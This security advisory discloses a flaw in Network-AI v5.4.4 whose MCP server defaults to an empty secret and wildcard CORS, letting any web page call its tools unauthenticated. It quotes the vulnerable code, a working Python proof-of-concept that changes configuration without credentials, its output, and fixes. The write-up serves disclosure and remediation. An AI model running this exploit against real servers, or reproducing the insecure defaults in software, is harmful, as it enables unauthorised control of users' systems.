Network-AI: Unauthenticated Cross-Origin MCP Tool Invocation via Empty Default Secret
🔗 CVE IDs covered (1)
📋 Description
Unauthenticated Cross-Origin MCP Tool Invocation via Empty Default Secret
| Field | Value | | ---------------- | ----- | | Repository | Jovancoding/Network-AI | | Affected version | v5.4.4 (commit c12686e181f231cf8d7bcf836a96d78f0f0877ac) |
Summary
The MCP SSE server defaults to an empty secret (process.env['NETWORK_AI_MCP_SECRET'] ?? '' at bin/mcp-server.ts:89), which causes _isAuthorized (lib/mcp-transport-sse.ts:254) to return true unconditionally for every request — no Authorization header is required. Simultaneously, _handleRequest sets Access-Control-Allow-Origin: * (lib/mcp-transport-sse.ts:272) on every response, so a cross-origin browser fetch can read the result without restriction. An unauthenticated attacker who can lure a user to a malicious web page can invoke all 22 exposed MCP tools — including config_set, agent_spawn, and blackboard_write — against a default-configured localhost server.
Affected Code
bin/mcp-server.ts:89 — default secret resolves to empty string, enabling open access
secret: process.env['NETWORK_AI_MCP_SECRET'] ?? '',
lib/mcp-transport-sse.ts:254 — auth guard short-circuits to true when secret is falsy
private _isAuthorized(req: http.IncomingMessage): boolean {
if (!this._opts.secret) return true;
const authHeader = req.headers['authorization'];
if (typeof authHeader !== 'string') return false;
const parts = authHeader.split(' ');
return parts[0]?.toLowerCase() === 'bearer' && parts[1] === this._opts.secret;
}
lib/mcp-transport-sse.ts:272 — wildcard CORS header applied unconditionally before any auth check
private _handleRequest(req: http.IncomingMessage, res: http.ServerResponse): void {
// CORS — allow any MCP client to connect
res.setHeader('Access-Control-Allow-Origin', '*');
res.setHeader('Access-Control-Allow-Methods', 'GET, POST, OPTIONS');
res.setHeader('Access-Control-Allow-Headers', 'Content-Type, Authorization');
lib/mcp-transport-sse.ts:367-368 — authenticated path dispatches parsed JSON-RPC frame directly to handleRPC with no further caller validation
const rpc = JSON.parse(body) as McpJsonRpcRequest;
const response = await this._bridge.handleRPC(rpc);
Any cross-origin browser request reaches handleRPC because _isAuthorized returns true (empty secret) and the Access-Control-Allow-Origin: * header lets the browser expose the response to the calling script.
Proof of Concept
Environment
- Network-AI v5.4.4 (latest)
- Docker container bound to
127.0.0.1:3001 - Python 3 +
requests
poc.py
import sys
import requests
BASE = "http://127.0.0.1:3001"
# Step 1: Verify CORS wildcard (simulating cross-origin preflight)
preflight = requests.options(
f"{BASE}/mcp",
headers={
"Origin": "http://evil.example.com",
"Access-Control-Request-Method": "POST",
"Access-Control-Request-Headers": "Content-Type",
},
)
acao = preflight.headers.get("Access-Control-Allow-Origin", "")
print(f"[*] OPTIONS /mcp -> {preflight.status_code}, Access-Control-Allow-Origin: {acao!r}")
if acao != "*":
print(f"RESULT: FAIL — expected ACAO='*', got {acao!r}")
sys.exit(1)
# Step 2: Invoke config_set with NO Authorization header from cross-origin
rpc_payload = {
"jsonrpc": "2.0",
"id": 1,
"method": "tools/call",
"params": {
"name": "config_set",
"arguments": {
"key": "maxParallelAgents",
"value": "999"
}
}
}
resp = requests.post(
f"{BASE}/mcp",
json=rpc_payload,
headers={
"Content-Type": "application/json",
"Origin": "http://evil.example.com",
# No Authorization header — exploiting empty-secret bypass
},
)
print(f"[*] POST /mcp (no auth, cross-origin) -> {resp.status_code}")
print(f"[*] Response body: {resp.text[:800]}")
resp_acao = resp.headers.get("Access-Control-Allow-Origin", "")
print(f"[*] Response Access-Control-Allow-Origin: {resp_acao!r}")
if resp.status_code != 200:
print(f"RESULT: FAIL — expected 200, got {resp.status_code}")
sys.exit(1)
body = resp.json()
result_content = body.get("result", {})
is_error = result_content.get("isError", True)
if is_error:
print(f"RESULT: FAIL — tool returned isError=true: {result_content}")
sys.exit(1)
# Step 3: Confirm CORS header on actual response (browser can read it)
if resp_acao != "*":
print(f"RESULT: FAIL — response ACAO not '*', browser would block read: {resp_acao!r}")
sys.exit(1)
print(f"RESULT: PASS — unauthenticated cross-origin POST /mcp (no Bearer token) succeeded with HTTP 200 and ACAO='*'; config_set executed without credentials (maxParallelAgents set to 999)")
Output
[*] OPTIONS /mcp -> 204, Access-Control-Allow-Origin: '*'
[*] POST /mcp (no auth, cross-origin) -> 200
[*] Response body: {"jsonrpc":"2.0","id":1,"result":{"content":[{"type":"text","text":"{\"ok\":true,\"tool\":\"config_set\",\"data\":{\"key\":\"maxParallelAgents\",\"previous\":null,\"current\":999,\"applied\":true}}"}],"isError":false}}
[*] Response Access-Control-Allow-Origin: '*'
RESULT: PASS — unauthenticated cross-origin POST /mcp (no Bearer token) succeeded with HTTP 200 and ACAO='*'; config_set executed without credentials (maxParallelAgents set to 999)
Verified conditions
OPTIONS /mcp→ 204,Access-Control-Allow-Origin: *— browser preflight accepted by serverPOST /mcp(no Authorization header) → 200,isError: false—config_setexecuted without credentials- Response
Access-Control-Allow-Origin: *— response is readable by the calling script in a browser context, confirming the attack is viable from a cross-origin malicious page
Impact
Any web page visited by a user who has the Network-AI MCP server running locally (default port 3001, no secret) can silently invoke all 22 MCP tools without credentials. Verified impact includes arbitrary orchestrator configuration mutation (config_set); the same vector applies to agent_spawn (spawning arbitrary agents), blackboard_write / blackboard_delete (corrupting shared agent state), and token_create / token_revoke (tampering with token management). Confidentiality impact is limited to data readable via MCP tools (blackboard contents, audit log queries); integrity impact is high because core orchestrator state can be overwritten; availability impact is low (service continues running but with attacker-controlled configuration).
Remediation
- Require a non-empty secret at startup: in
bin/mcp-server.ts, reject launch whenargs.secretis empty and--stdiois not set:if (!args.secret && !args.stdio) { console.error('ERROR: --secret <token> or NETWORK_AI_MCP_SECRET must be set for SSE mode.'); process.exit(1); } - Restrict CORS to localhost origins only: in
lib/mcp-transport-sse.ts:_handleRequest, replace the wildcard with an allowlist:const origin = req.headers['origin'] ?? ''; const allowed = /^https?:\/\/(localhost|127\.0\.0\.1)(:\d+)?$/.test(origin); res.setHeader('Access-Control-Allow-Origin', allowed ? origin : ''); res.setHeader('Vary', 'Origin'); - Move CORS headers after the auth check so a rejected request never advertises cross-origin access, or apply CORS only on the SSE endpoint (
/sse) if cross-origin streaming is needed and not on/mcp.
🎯 Affected products1
- npm/network-ai:<= 5.4.4